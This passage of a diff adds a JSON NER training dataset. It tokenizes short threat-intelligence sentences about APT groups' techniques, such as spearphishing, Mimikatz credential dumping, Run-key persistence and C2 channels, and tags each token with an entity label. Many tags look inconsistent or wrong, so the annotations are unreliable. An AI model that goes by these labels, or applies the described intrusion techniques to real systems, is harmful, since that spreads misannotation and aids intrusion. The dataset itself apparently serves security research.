+ "reconnaissance", + "against", + "targets", + "of", + "interest." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Exp", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "used", + "cryptcat", + "binaries", + "to", + "encrypt", + "their", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "modified", + "files", + "based", + "on", + "the", + "open-source", + "project", + "cryptcat", + "in", + "an", + "apparent", + "attempt", + "to", + "decrease", + "anti-virus", + "detection", + "rates." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "used", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "B-OffAct", + "O", + "B-Idus", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "developed,", + "prior", + "to", + "the", + "attack,", + "malware", + "capabilities", + "that", + "would", + "require", + "access", + "to", + "specific", + "and", + "specialized", + "hardware", + "and", + "software." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Exp", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "renamed", + "files", + "to", + "look", + "like", + "legitimate", + "files,", + "such", + "as", + "Windows", + "update", + "files", + "or", + "Schneider", + "Electric", + "application", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-OffAct", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "used", + "a", + "publicly", + "available", + "PowerShell-based", + "tool,", + "WMImplant." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "O", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "installed", + "scheduled", + "tasks", + "defined", + "in", + "XML", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Exp", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "used", + "tools", + "such", + "as", + "Mimikatz", + "and", + "other", + "open-source", + "software." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "I-OffAct", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "captured", + "credentials", + "as", + "they", + "were", + "being", + "changed", + "by", + "redirecting", + "text-based", + "login", + "codes", + "to", + "websites", + "they", + "controlled." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "downloaded", + "binary", + "data", + "from", + "a", + "specified", + "domain", + "after", + "the", + "malicious", + "document", + "is", + "opened." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "prompted", + "victims", + "to", + "accept", + "macros", + "in", + "order", + "to", + "execute", + "the", + "subsequent", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "disguised", + "its", + "scheduled", + "tasks", + "as", + "those", + "used", + "by", + "Google." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "used", + "port", + "4050", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "used", + "ConfuserEx", + "to", + "obfuscate", + "its", + "variant", + "of", + "Imminent", + "Monitor,", + "compressed", + "payload", + "and", + "RAT", + "packages,", + "and", + "password", + "protected", + "encrypted", + "email", + "attachments", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "used", + "a", + "macro", + "function", + "to", + "set", + "scheduled", + "tasks,", + "disguised", + "as", + "those", + "used", + "by", + "Google." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "used", + "spearphishing", + "emails", + "with", + "password", + "protected", + "RAR", + "attachment", + "to", + "avoid", + "being", + "detected", + "by", + "the", + "email", + "gateway." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "APT-C-36", + "obtained", + "and", + "used", + "a", + "modified", + "variant", + "of", + "Imminent", + "Monitor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT-C-36", + "has", + "embedded", + "a", + "VBScript", + "within", + "a", + "malicious", + "Word", + "document", + "which", + "is", + "executed", + "upon", + "the", + "document", + "opening." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "used", + "RAR", + "to", + "compress", + "files", + "before", + "moving", + "them", + "outside", + "of", + "the", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "used", + "a", + "batch", + "script", + "to", + "perform", + "a", + "series", + "of", + "discovery", + "techniques", + "and", + "saves", + "it", + "to", + "a", + "text", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "collected", + "files", + "from", + "a", + "local", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "registered", + "hundreds", + "of", + "domains", + "for", + "use", + "in", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "hijacked", + "FQDNs", + "associated", + "with", + "legitimate", + "websites", + "hosted", + "by", + "hop", + "points." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "created", + "email", + "accounts", + "for", + "later", + "use", + "in", + "social", + "engineering,", + "phishing,", + "and", + "when", + "registering", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "been", + "known", + "to", + "use", + "credential", + "dumping", + "using", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT1", + "used", + "the", + "commands", + "<code>net", + "localgroup</code>,<code>net", + "user</code>,", + "and", + "<code>net", + "group</code>", + "to", + "find", + "accounts", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "uses", + "two", + "utilities,", + "GETMAIL", + "and", + "MAPIGET,", + "to", + "steal", + "email.", + "GETMAIL", + "extracts", + "emails", + "from", + "archived", + "Outlook", + ".pst", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT1", + "used", + "publicly", + "available", + "malware", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "file", + "name", + "AcroRD32.exe,", + "a", + "legitimate", + "process", + "name", + "for", + "Adobe's", + "Acrobat", + "Reader,", + "was", + "used", + "by", + "APT1", + "as", + "a", + "name", + "for", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "listed", + "connected", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "APT1", + "group", + "is", + "known", + "to", + "have", + "used", + "pass", + "the", + "hash." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "gathered", + "a", + "list", + "of", + "running", + "processes", + "on", + "the", + "system", + "using", + "<code>tasklist", + "/v</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "APT1", + "group", + "is", + "known", + "to", + "have", + "used", + "RDP", + "during", + "operations." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "uses", + "two", + "utilities,", + "GETMAIL", + "and", + "MAPIGET,", + "to", + "steal", + "email.", + "MAPIGET", + "steals", + "email", + "still", + "on", + "Exchange", + "servers", + "that", + "has", + "not", + "yet", + "been", + "archived." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "hyperlinks", + "to", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "used", + "the", + "<code>ipconfig", + "/all</code>", + "command", + "to", + "gather", + "network", + "configuration", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "used", + "the", + "<code>net", + "use</code>", + "command", + "to", + "get", + "a", + "listing", + "on", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "used", + "the", + "commands", + "<code>net", + "start</code>", + "and", + "<code>tasklist</code>", + "to", + "get", + "a", + "listing", + "of", + "the", + "services", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "used", + "various", + "open-source", + "tools", + "for", + "privilege", + "escalation", + "purposes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT1", + "has", + "used", + "the", + "Windows", + "command", + "shell", + "to", + "execute", + "commands,", + "and", + "batch", + "scripting", + "to", + "automate", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT12", + "has", + "used", + "blogs", + "and", + "WordPress", + "for", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT12", + "has", + "used", + "multiple", + "variants", + "of", + "DNS", + "Calculation", + "including", + "multiplying", + "the", + "first", + "two", + "octets", + "of", + "an", + "IP", + "address", + "and", + "adding", + "the", + "third", + "octet", + "to", + "that", + "value", + "in", + "order", + "to", + "get", + "a", + "resulting", + "command", + "and", + "control", + "port." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT12", + "has", + "exploited", + "multiple", + "vulnerabilities", + "for", + "execution,", + "including", + "Microsoft", + "Office", + "vulnerabilities", + "(CVE-2009-3129,", + "CVE-2012-0158)", + "and", + "vulnerabilities", + "in", + "Adobe", + "Reader", + "and", + "Flash", + "(CVE-2009-4324,", + "CVE-2009-0927,", + "CVE-2011-0609,", + "CVE-2011-0611)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "B-Features", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Tool", + "B-Features", + "B-Features", + "B-Features", + "B-Features" + ] + }, + { + "tokens": [ + "APT12", + "has", + "attempted", + "to", + "get", + "victims", + "to", + "open", + "malicious", + "Microsoft", + "Word", + "and", + "PDF", + "attachment", + "sent", + "via", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT12", + "has", + "sent", + "emails", + "with", + "malicious", + "Microsoft", + "Office", + "documents", + "and", + "PDFs", + "attached." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT16", + "has", + "compromised", + "otherwise", + "legitimate", + "sites", + "as", + "staging", + "servers", + "for", + "second-stage", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT17", + "has", + "created", + "and", + "cultivated", + "profile", + "pages", + "in", + "Microsoft", + "TechNet.", + "To", + "make", + "profile", + "pages", + "appear", + "more", + "legitimate,", + "APT17", + "has", + "created", + "biographical", + "sections", + "and", + "posted", + "in", + "forum", + "threads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT17", + "has", + "created", + "profile", + "pages", + "in", + "Microsoft", + "TechNet", + "that", + "were", + "used", + "as", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "actors", + "used", + "the", + "native", + "at", + "Windows", + "task", + "scheduler", + "tool", + "to", + "use", + "scheduled", + "tasks", + "for", + "execution", + "on", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "uses", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "obfuscates", + "strings", + "in", + "the", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "actors", + "leverage", + "legitimate", + "credentials", + "to", + "log", + "into", + "external", + "remote", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "APT18", + "actors", + "deleted", + "tools", + "and", + "batch", + "files", + "from", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "can", + "list", + "files", + "information", + "for", + "specific", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "can", + "upload", + "a", + "file", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "establishes", + "persistence", + "via", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "can", + "collect", + "system", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "actors", + "leverage", + "legitimate", + "credentials", + "to", + "log", + "into", + "external", + "remote", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "APT18", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT18", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "Base64", + "to", + "obfuscate", + "executed", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "downloaded", + "and", + "launched", + "code", + "within", + "a", + "SCT", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT19", + "launched", + "an", + "HTTP", + "malware", + "variant", + "and", + "a", + "Port", + "22", + "malware", + "variant", + "using", + "a", + "legitimate", + "executable", + "that", + "loaded", + "the", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT19", + "HTTP", + "malware", + "variant", + "decrypts", + "strings", + "using", + "single-byte", + "XOR", + "keys." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "performed", + "a", + "watering", + "hole", + "attack", + "on", + "forbes.com", + "in", + "2014", + "to", + "compromise", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "Base64", + "to", + "obfuscate", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "<code>-W", + "Hidden</code>", + "to", + "conceal", + "PowerShell", + "windows", + "by", + "setting", + "the", + "WindowStyle", + "parameter", + "to", + "hidden." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT19", + "uses", + "a", + "Port", + "22", + "malware", + "variant", + "to", + "modify", + "several", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "PowerShell", + "commands", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT19", + "HTTP", + "malware", + "variant", + "establishes", + "persistence", + "by", + "setting", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows", + "Debug", + "Tools-%LOCALAPPDATA%\\</code>." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "Regsvr32", + "to", + "bypass", + "application", + "control", + "techniques." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "configured", + "its", + "payload", + "to", + "inject", + "into", + "the", + "rundll32.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT19", + "sent", + "spearphishing", + "emails", + "with", + "malicious", + "attachments", + "in", + "RTF", + "and", + "XLSM", + "formats", + "to", + "deliver", + "initial", + "exploits." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT19", + "HTTP", + "malware", + "variant", + "used", + "Base64", + "to", + "encode", + "communications", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "collected", + "system", + "architecture", + "information.", + "APT19", + "used", + "an", + "HTTP", + "malware", + "variant", + "and", + "a", + "Port", + "22", + "malware", + "variant", + "to", + "gather", + "the", + "hostname", + "and", + "CPU", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "an", + "HTTP", + "malware", + "variant", + "and", + "a", + "Port", + "22", + "malware", + "variant", + "to", + "collect", + "the", + "MAC", + "address", + "and", + "IP", + "address", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "used", + "an", + "HTTP", + "malware", + "variant", + "and", + "a", + "Port", + "22", + "malware", + "variant", + "to", + "collect", + "the", + "victim’s", + "username." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT19", + "has", + "obtained", + "and", + "used", + "publicly-available", + "tools", + "like", + "Empire." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "APT19", + "used", + "HTTP", + "for", + "C2", + "communications.", + "APT19", + "also", + "used", + "an", + "HTTP", + "malware", + "variant", + "to", + "communicate", + "over", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT19", + "Port", + "22", + "malware", + "variant", + "registers", + "itself", + "as", + "a", + "service." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "Powershell", + "cmdlet", + "to", + "grant", + "the", + "<code>ApplicationImpersonation</code>", + "role", + "to", + "a", + "compromised", + "account." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "several", + "malicious", + "applications", + "that", + "abused", + "OAuth", + "access", + "tokens", + "to", + "gain", + "access", + "to", + "target", + "email", + "accounts,", + "including", + "Gmail", + "and", + "Yahoo", + "Mail." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Idus" + ] + }, + { + "tokens": [ + "APT28", + "used", + "a", + "publicly", + "available", + "tool", + "to", + "gather", + "and", + "compress", + "multiple", + "documents", + "on", + "the", + "DCCC", + "and", + "DNC", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "variety", + "of", + "utilities,", + "including", + "WinRAR,", + "to", + "archive", + "collected", + "data", + "with", + "password", + "protection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + 